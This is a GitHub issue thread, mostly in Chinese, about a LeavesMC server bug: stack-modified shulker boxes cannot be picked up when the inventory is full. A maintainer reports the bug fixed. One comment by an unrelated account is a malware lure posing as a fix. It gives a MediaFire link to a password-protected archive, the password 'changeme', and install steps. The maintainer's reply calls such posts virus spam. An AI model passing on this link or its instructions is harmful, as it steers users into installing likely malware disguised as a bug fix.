### ISSUE TITLE
修改潜影盒堆叠后在满背包下有拾取异常

### ISSUE THREAD

**Issue by SunshineZX1949** [LeavesMC/Leaves#329]
### 服务端版本 LeavesMC Version

Leaves version 1.21.1-55-master@76d5ab8 

### 预期的行为 Expected behavior

修改潜影盒堆叠后，在背包满时可以正常拾取潜影盒（潜影盒堆叠未到上限

### 观测到的实际行为 Observed/Actual behavior

修改潜影盒堆叠后，在背包满时无法拾取潜影盒（潜影盒堆叠未到上限

### 复现步骤 Steps/models to reproduce

![image](https://github.com/user-attachments/assets/f5786838-95f2-4eec-9951-00640e70e985)
![image](https://github.com/user-attachments/assets/06a63fc6-67fa-4bb4-ae35-e9f3b1819bdd)
![image](https://github.com/user-attachments/assets/c843cdf1-04a5-438f-a586-f0628516f7a7)
当背包空出位置时
![image](https://github.com/user-attachments/assets/642c7c3c-ebba-4a4d-9ec8-e3879ad42333)

### 插件与数据包列表。 Plugin and Datapack List.

leaves,啥都没加

### 更多详细信息。 The more information.

无关:(也许你是第二次看到这个报错，原来的号因为病毒毁掉了)

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by s-yh-china** [comment]
这僵尸病毒太多了，我删不完了，得写个action了

**Comment by s-yh-china** [comment]
已修复，待测试
